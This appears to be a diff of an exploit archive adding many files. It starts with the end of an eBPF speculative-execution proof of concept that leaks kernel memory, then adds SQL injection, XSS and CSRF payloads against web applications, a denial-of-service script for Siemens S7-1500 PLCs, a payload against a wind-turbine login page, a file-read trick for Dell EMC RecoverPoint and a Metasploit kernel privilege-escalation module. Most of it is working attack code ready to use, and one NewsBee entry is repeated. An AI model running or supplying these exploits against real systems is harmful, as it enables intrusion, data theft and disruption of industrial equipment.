#define BPF_REG_LEAK_ARRAY BPF_REG_9
#define BPF_REG_CONFUSED BPF_REG_1
#define BPF_REG_SECRET_VALUE BPF_REG_2
#define BPF_REG_DUMMY_SLOT BPF_REG_3
for (int i=0; i<16; i++) {
bool dummy_ff = (i >= 8);
int selected_bit = i & 7;
struct bpf_insn insns[] = {
/* setup: write 0x00 or 0xff to -216 to get a big stack
allocation and to prepare dummy */
BPF_ST_MEM(BPF_B, BPF_REG_FP, -216, dummy_ff ? 0x00 : 0xff),
/* setup: compute stack slot pointers to :
* - type-confused stack slot (at -72)
* - pointer to type-confused stack slot (at -144)
*/
BPF_MOV64_REG(BPF_REG_CONFUSED_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_CONFUSED_SLOT, -72),
BPF_MOV64_REG(BPF_REG_SLOW_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_SLOW_SLOT, -144),
//BPF_MOV64_REG(BPF_REG_0, BPF_REG_FP),
//BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -216),
/* write to dummy slot (to make a big stack and to permit later read) */
//BPF_ST_MEM(BPF_DW, BPF_REG_0, 0, 0),
/* setup: store victim memory pointer in BPF_REG_CONFUSED_SLOT */
BPF_LD_MAP_FD(BPF_REG_ARG1, input_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT, BPF_REG_0, 0),
/* setup: spill pointer to type-confused stack slot */
BPF_STX_MEM(BPF_DW, BPF_REG_SLOW_SLOT, BPF_REG_CONFUSED_SLOT, 0),
/* setup: load pointer to leak area into register */
BPF_LD_MAP_FD(BPF_REG_ARG1, leak_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 2048), /* leak_map+2048 */
BPF_MOV64_REG(BPF_REG_LEAK_ARRAY, BPF_REG_0),
/* CHEATED: fence and flush */
BPF_MOV64_REG(BPF_REG_1, BPF_REG_SLOW_SLOT),
BPF_EMIT_CALL(4/*clflush_mfence*/),
BPF_MOV64_REG(BPF_REG_DUMMY_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_DUMMY_SLOT, -216),
/* START CRITICAL PATH */
BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,
BPF_REG_SLOW_SLOT, 0), /* high-latency read of slot address */
BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,
BPF_REG_DUMMY_SLOT, 0), /* bypassed store via high-latency address */
BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED, BPF_REG_CONFUSED_SLOT, 0),
BPF_LDX_MEM(BPF_B, BPF_REG_SECRET_VALUE, BPF_REG_CONFUSED, 0),
BPF_ALU64_IMM(BPF_AND, BPF_REG_SECRET_VALUE, 1<<selected_bit),
/* 0 or 1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_SECRET_VALUE, 12-selected_bit),
/* 0 or 0x1000 */
BPF_ALU64_REG(BPF_ADD, BPF_REG_LEAK_ARRAY, BPF_REG_SECRET_VALUE),
BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_LEAK_ARRAY, 0),
/* END CRITICAL PATH */
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
};
sockfds[i] = create_filtered_socket_fd(insns, ARRSIZE(insns));
puts("BPF PROG LOADED SUCCESSFULLY");
}
/*
puts("testing flushed...\n");
for (int i=-1; i<10; i++) {
unsigned int res = array_time_flush_loc(leak_map, 0, 2048);
if (i >= 0)
printf(" %u\n", res);
}
*/
unsigned long base_addr = strtoull(argv[1], NULL, 16);
for (int i=0; i<atoi(argv[2]); i++) {
unsigned long addr = base_addr + i;
unsigned char leaked = leak_byte(addr);
printf("%016lx: 0x%02hhx ('%c')\n", addr, leaked, leaked);
}
return 0;
}
*/
----------------------- END -----------------------
PoC usage:
$ sudo grep core_pattern /proc/kallsyms
ffffffff9b2954e0 D core_pattern
$ gcc -o bpf_store_skipper_assisted bpf_store_skipper_assisted.c
$ time ./bpf_store_skipper_assisted ffffffff9b2954e0 5
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
4 vs 96
1 vs 99
100 vs 0
100 vs 0
100 vs 0
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e0: 0x63 ('c')
2 vs 98
1 vs 99
1 vs 99
1 vs 99
100 vs 0
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e1: 0x6f ('o')
100 vs 0
3 vs 97
100 vs 0
100 vs 0
1 vs 99
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e2: 0x72 ('r')
2 vs 98
100 vs 0
0 vs 100
100 vs 0
100 vs 0
0 vs 100
0 vs 100
100 vs 0
ffffffff9b2954e3: 0x65 ('e')
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
ffffffff9b2954e4: 0x00 ('')
real 0m31.591s
user 0m2.547s
sys 0m27.429s
*/

48
exploits/hardware/webapps/44684.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Nordex N149/4.0-4.5 Wind Turbine Web Server - SQL Injection
# Date: 21-05-2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.nordex-online.com
# Tested on: Windows
# Version: N149/4.0-4.5 Wind Turbine
# Category: webapps
---> Proof Of Concept
-------- > Request
POST /php/login.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept: */*
Referer: http://IpAdress//
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: IPAdress
Accept-Encoding: gzip, deflate
Content-Length: 304
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
login=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&password=3
-------- > Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 261
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Date: Wed, 16 May 2018 10:49:31 GMT
Vary: Accept-Encoding
<br />
<b>Warning</b>: mysqli::query(): (23000/1062): Duplicate entry
'_!@4dilemma:1' for key 'group_key' in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>46</b><br />
<br />
<b>Notice</b>: Trying to get property of non-object in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>47</b><br />
FALSE<br />
<b>Fatal error</b>: Call to a member function free() on boolean in
<b>/share/HDA_DATA/Web/php/login.php</b> on line <b>67</b><br />

17
exploits/java/webapps/44691.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: ERPnext 11.x.x - Cross-Site Scripting
# Date: 2018-05-10
# Exploit Author: Veerababu Penugonda
# Vendor Homepage: https://erpnext.com/
# Software Link: https://demo.erpnext.com/
# Version: Frappe ERPNext v11.x.x-develop
# Tested on: Mozilla Firefox quantum 60.1 , Ubuntu OS
# CVE : CVE-2018-11339
# 1. Description:
# https://demo.erpnext.com/desk#Form/Asset%20Repair/ARLOG-000015
# and functionality “Comment” is vulnerable to XSS like Stored ,
# Reflected , Cookie , possible for more
# 2. Payload :
"><script>alert(1)</script>

18
exploits/linux/dos/44693.py Executable file
View file

@ -0,0 +1,18 @@
# Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1500 CPU all versions before V1.6
# Tested on: Kali Linux
# CVE: CVE-2014-5074
#!/usr/bin/python
import socket import sys from time import sleep if
len(sys.argv) != 2: print "Usage: exploit.py <ip>" sys.exit(0) for x in
range(1,50): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#vulnerable TCP port 102 connect=s.connect((str(sys.argv[1]), 102))
s.send('some evil string \r\n\n') print "bufff " + str(x) + " sent...\n"
result=s.recv(1024) print result s.close() sleep(7)

30
exploits/linux/local/44688.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
# Date: 2018-05-21
# Vendor Advisory: DSA-2018-095
# Vendor KB: https://support.emc.com/kb/521234
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo/dell-emc_recoverpoint
# Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
# CVE: N/A
# 1. Description
# When logging in as boxmgmt and running an internal command, the ssh command may be used
# to display the contents of files from the file system which are accessible to the boxmgmt user.
# 2. Proof of Concept
# Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
# Select [3] Diagnostics
# Select [5] Run Internal Command
# ssh -F /etc/passwd 127.0.0.1
test-cluster: 5
This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
Enter internal command: ssh -F /etc/passwd 127.0.0.1
/etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
/etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
/etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
<SNIP>
/etc/passwd: terminating, 34 bad configuration options
Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280

200
exploits/linux/local/44696.rb Executable file
View file

@ -0,0 +1,200 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AF_PACKET chocobo_root Privilege Escalation',
'Description' => %q{
This module exploits a race condition and use-after-free in the
packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in
the Linux kernel to execute code as root (CVE-2016-8655).
The bug was initially introduced in 2011 and patched in 2016 in version
4.4.0-53.74, potentially affecting a large number of kernels; however
this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels
4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as
Linux Mint.
The target system must have unprivileged user namespaces enabled and
two or more CPU cores.
Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation
may crash the kernel.
This module has been tested successfully on Linux Mint 17.3 (x86_64);
Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel
versions 4.4.0-45-generic and 4.4.0-51-generic.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rebel', # Discovery and chocobo_root.c exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Aug 12 2016',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'AKA', 'chocobo_root.c' ],
[ 'EDB', '40871' ],
[ 'CVE', '2016-8655' ],
[ 'BID', '94692' ],
[ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ],
[ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],
[ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],
[ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],
[ 'URL', 'https://usn.ubuntu.com/3151-1/' ],
[ 'URL', 'https://www.securitytracker.com/id/1037403' ],
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]
],
'DefaultTarget' => 0))
register_options [
OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end
def timeout
datastore['TIMEOUT'].to_i
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
gcc_cmd = "gcc -o #{path} #{path}.c -lpthread"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
rm_f "#{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
cmd_exec "chmod +x #{path}"
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
version = kernel_release
unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/
vprint_error "Linux kernel version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Linux kernel version #{version} is vulnerable"
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"
cores = get_cpu_info[:cores].to_i
min_required_cores = 2
unless cores >= min_required_cores
vprint_error "System has less than #{min_required_cores} CPU cores"
return CheckCode::Safe
end
vprint_good "System has #{cores} CPU cores"
unless userns_enabled?
vprint_error 'Unprivileged user namespaces are not permitted'
return CheckCode::Safe
end
vprint_good 'Unprivileged user namespaces are permitted'
CheckCode::Appears
end
def exploit
if check != CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('chocobo_root.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('chocobo_root')
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status "Launching exploit (Timeout: #{timeout})..."
output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
output.each_line { |line| vprint_status line.chomp }
print_status "Cleaning up #{payload_path} and #{executable_path}.."
rm_f executable_path
rm_f payload_path
end
end

12
exploits/linux/webapps/44687.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family Versions: V2.X and V3.X.
# Tested on: Kali Linux
# CVE: CVE-2014-2908
http://TargetIp/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=
<http://targetip/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=>"><img
src=x onerror=prompt(1);>&Send=Filter

39
exploits/linux/webapps/44698.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
Payload: id=5' AND 3563=3563 AND 'HmOW'='HmOW
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
id=5' AND (SELECT 7446 FROM(SELECT
COUNT(*),CONCAT(0x7178707871,(SELECT
(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc
# Type: AND/OR time-based blind
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=5' AND SLEEP(5) AND 'KdYd'='KdYd
# Type: UNION query
# Demo: http://target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=-1714' UNION ALL SELECT
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
WSZd&t=gallery

87
exploits/php/webapps/44685.txt Normal file
View file

@ -0,0 +1,87 @@
# Exploit Title: Zechat 1.5 - 'hashtag' / 'v' SQL Injection / Cross site request forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://bylancer.com
# Version: 1.5
# Tested on: Kali linux
====================================================
# POC 1 : SQLi :
Parameter : hashtag
type : Union based
http://test.com/chat/hashtag?hashtag=[SQL]
# test :
http://test.com/chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23
# Payload : -1' UNION SELECT
NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()%23
====================================================
Parameter : v
type : time-based blind
test.com/chat/me?action=edit&v=[SQL]
# test : test.com/chat/me?action=edit&v=231 AND sleep(10)%23
# Payload : AND sleep(10)%23
====================================================
# POC 2 : CSRF :
# CSRF vulnerability allows attacker to change user's information.
In this script we have anti-csrf which we can't change user's information
without token.
So we use 'hashtag' parameter to set our encoded payload and bypass csrf
protection : chat/hashtag?hashtag=[We have Reflected XSS here]
# Exploit :
<form action="http://test.com/chat/data_settings.php" method="POST">
<input type="hidden" name="csrf&#95;token" value="" />
<input type="hidden" name="Wall"
value="Hello&#32;would&#32;you&#32;like&#32;to&#32;be&#32;my&#32;friend" />
<input type="hidden" name="user" value="lord225" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="mail"
value="d3code&#46;n&#64;gmail&#46;com" />
<input type="hidden" name="website" value="test" />
<input type="hidden" name="sex" value="male" />
<input type="hidden" name="country"
value="&#45;&#45;&#45;&#45;&#45;&#45;" />
<input type="hidden" name="day" value="" />
<input type="hidden" name="month" value="" />
<input type="hidden" name="year" value="" />
<input type="hidden" name="Language" value="en" />
</form>
<script>
var token = '';
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var setPage = this.responseXML;
token = setPage.forms[1].elements[0].value; // get token
console.log(token);
}
}
req.open("POST","/chat/settings",true);
req.setRequestHeader("content-type","application/x-www-form-urlencoded");
req.responseType = "document";
req.send();
document.forms[0].elements[0].value = token; // set token to our form
document.forms[0].submit();
</script>
=====================================================

10
exploits/php/webapps/44686.txt Normal file
View file

@ -0,0 +1,10 @@
# Exploit Title: WebSocket Live Chat - Cross-Site Scripting
# Date: 2018-05-22
# Exploit Author: Alireza Norkazemi
# Vendor Homepage: https://codecanyon.net/item/websocket-live-chat-instant-messaging-php/16545798?s_rank=1
# POC :
1) Create your account and click setting icon and go to profile
2) Put this payload into Status box :
<script>alert('xss')</script>
3) The payload will be executed if someone opens your profile

27
exploits/php/webapps/44689.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: PaulPrinting CMS Printing 1.0 - SQL Injection
# Exploit Date: 2018-05-19
# Software Link: https://codecanyon.net/item/paulprinting-cms-printing-solutions/19546365
# Author: Mehmet Onder Key
# Version: 1.0
# Tested On: Linux
# 1. Description
# Any visitor can run code to exploit css and sql vulnerabilities in the
# products and order sections.
# 2. Proof of Concept
# Example parameter with demo site : http://demo.codepaul.com/
# printing/products/businesscard?pricelist=1&format=90x50&pages=2p4cf&
# paper=300g_ma&refinement=lamco
# Time-Based Blind SQL Payload:
format=keyney+akkus') OR SLEEP(5)-- DLea
# Boolean-Based Blind SQL Payload:
refinement=were') OR NOT 4134=4134#
# Error-Based SQL Payload
paper=here') OR (SELECT 1712 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT
(ELT(1712=1712,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oXDz
etc... (all parameter is effected -pricelist)

51
exploits/php/webapps/44692.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2
# Version: 1.2.0
# Tested on: Kali linux
# POC 1 : Cross-Site scripting:
1) Create your account and navigate to "write post".
2) Put this payload and click on "post" :
<script>alert(document.cookie)</script>
3) You will have an alert box in your page .
# POC 2 : Cross-Site Scripting:
1) Navigate to "Albums" and click on "create album"
2) In title field , put this payload :
"/><script>alert(document.cookie)</script>
3) In both cases , the payload will be executed after someone opens your
album or your profile.
# POC 3 : Cross-Site Request Forgery:
# iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability .
# Attacker can easily change user's email or delete user's account .
# Change email Exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://Target/isocial/demo/services/actionssetting/email" method="POST">
<input type="hidden" name="em" value="lord2&#64;gmail&#46;com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Result :
# html "The information has been updated"
# status "OK"
# message ""
# Delete account Exploit:
<img src="
http://Target/isocial/demo/services/actionssetting/delete">

54
exploits/php/webapps/44699.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Auto car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/auto-car-car-listing-script/19221368?s_rank=1159
# Version: 1.2
# Tested on: Win 10
# POC 1: SQLi:
# Parameter: car_title
# Type: Error based
# Payload: 1' and extractvalue(1,Concat(0x3a,user(),0x3a))#
# test: http://target/scripts/autocar_preview/
# Request:
POST /scripts/autocar_preview/search-cars HTTP/1.1
Host: kamleshyadav.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://kamleshyadav.com/scripts/autocar_preview/
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Connection: keep-alive
Upgrade-Insecure-Requests: 1
car_title=1' and extractvalue(1,Concat(0x3a,user(),0x3a))#
# Response:
HTTP/1.1 500 Internal Server Error
Server: nginx/1.12.2
Date: Tue, 22 May 2018 14:36:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1371
Connection: keep-alive
<h1>A Database Error Occurred</h1>
<p>Error Number: 1105</p><p>XPATH syntax error:
':kamleshy_event@localhost:'</p><p>SELECT
*
FROM `autocar_car_details`
WHERE `car_status` = 1 AND `car_title` LIKE '%1' and
extractvalue(1,Concat(0x3a,user(),0x3a))#%'</p>
# POC 2: Cross site scripting:
1) Create your account and navigate to "edit profile"
2) Put this payload in "name" and update your profile:
<script>alert('xss')</script>
3) You will have an alert box in your page .

39
exploits/php/webapps/44700.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
iPayload: id=5' AND 3563=3563 AND 'HmOW'='HmOW
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
id=5' AND (SELECT 7446 FROM(SELECT
COUNT(*),CONCAT(0x7178707871,(SELECT
(ELT(7446=7446,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rNYc'='rNYc
# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=5' AND SLEEP(5) AND 'KdYd'='KdYd
# Type: UNION query
# Demo: http://Target/NewsBee/admin/home-text-edit.php?id=5
# Payload:
id=-1714' UNION ALL SELECT
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
WSZd&t=gallery

22
exploits/php/webapps/44701.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Feedy RSS News Ticker 2.0 - 'cat' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/feedy-rss-news-ticker/5818277
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: cat
# Type: boolean-based blind
# Demo: http://target/feedy/category.php?cat=
# Payload:
cat=akkus+keyney' AND 2367=2367 AND 'NKyC'='NKyC
# Type: AND/OR time-based blind
# Demo: http://demo.cudevo.com/feedy/category.php?cat=1
# Payload:
cat=akkus+keyney' AND SLEEP(5) AND 'AEHg'='AEHg

62
exploits/php/webapps/44702.txt Normal file
View file

@ -0,0 +1,62 @@
# Exploit Title: NewsBee CMS 1.4 - 'download.php' SQL Injection
# Dork: N/A
# Date: 2018-05-22
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# PoC: SQLi:
# Parameter: id
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578' AND 2043=2043 AND 'KzTm'='KzTm&t=gallery
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
id=578' AND (SELECT 7126 FROM(SELECT
COUNT(*),CONCAT(0x7162787871,(SELECT
